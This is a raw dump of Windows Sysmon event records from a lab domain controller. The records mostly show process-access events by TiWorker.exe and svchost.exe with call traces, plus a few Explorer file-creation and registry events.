b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.920{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.904{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.904{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.904{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.857{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 11241100x80000000000000005887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.826{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer (7).lnk2021-03-31 12:02:24.826 13241300x80000000000000005886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1042SetValue2021-03-31 12:02:24.764{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 
11241100x80000000000000005885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.733{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (7).lnk2021-03-31 12:02:24.733 10341000x80000000000000005884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 